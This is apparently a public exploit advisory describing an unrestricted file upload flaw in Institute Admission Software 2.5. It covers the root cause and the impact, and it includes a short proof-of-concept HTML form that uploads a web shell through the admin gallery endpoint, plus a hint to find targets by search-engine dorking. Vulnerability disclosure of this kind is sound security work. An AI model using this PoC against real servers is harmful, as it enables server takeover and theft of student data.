Institute Admission Software 2.5 is known to have a critical Institute Admission Software 2.5 is known to have a critical shell upload vulnerability.

This flaw typically resides in insecure file upload functionalities within the application. Attackers exploit it by uploading malicious web shell scripts (e.g., PHP, ASP) instead of legitimate files like documents or images.

When the server processes or stores the uploaded script, it can be executed. This grants the attacker Remote Code Execution (RCE) capabilities, giving them full control over the web server.

Consequences include accessing, modifying, or deleting sensitive student and institutional data, defacing the website, or using the server as a pivot point for further network attacks. This is a severe vulnerability requiring immediate patching, strict input validation, and secure file handling practices.

=============================================================================================================================================
| # Title : Institute Admission Software 2.5 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 137.0.1 (64 bits) |
| # Vendor : https://softmaart.com/institute-admission-software.php |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] summary : This vulnerability affects Institute Admission Software v2.5, where the application fails to properly validate and restrict uploaded files in the gallery upload functionality within the admin panel.
An attacker can exploit this weakness by directly submitting a crafted multipart/form-data POST request to the vulnerable endpoint, allowing the upload of arbitrary executable files instead of legitimate images.
Due to the absence of strict server-side file type validation, content inspection, and execution controls,
a malicious file (e.g. PHP web shell or executable payload) can be successfully uploaded to the publicly accessible /uploads/ directory.
Once uploaded, the attacker may directly access the file via the browser, potentially leading to Remote Code Execution (RCE) on the target server.

[+] Impact includes:

Arbitrary file upload

Remote command execution

Full web application compromise

Possible server takeover depending on permissions

[+] Root Cause:

Missing MIME-type and extension validation

No server-side file execution restrictions

Insecure upload directory exposure

[+] Severity: High

Attack Vector: Remote / Unauthenticated (depending on admin access exposure)

This issue highlights a critical failure in secure file handling practices and emphasizes the necessity of enforcing strict upload validation, randomized file naming, execution blocking, and proper access controls.

[+] The following html code uploads a executable malicious file remotely .

[+] Save code As : poc.html

[+] Line 01 set your Target

[+] Link to the uploaded files :/uoploads/

[+] use payload :

<form action="http://127.0.0.1/gpgcgairsain.ac.in/admin_panel/gallery.php?id=19" method="POST" enctype="multipart/form-data">
<label for="event">Event:</label>
<select name="event" id="event">
<option value="19">Hindi Departmental Programme</option>
<!-- ????? ????? ?????? ??????? ??? -->
</select>
<br><br>

<label for="photo">Photo:</label>
<input type="file" name="photo" id="photo" accept="image/*">
<br><br>

<input type="hidden" name="db_photo" value="">

<input type="submit" name="submit" value="Upload">
</form>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================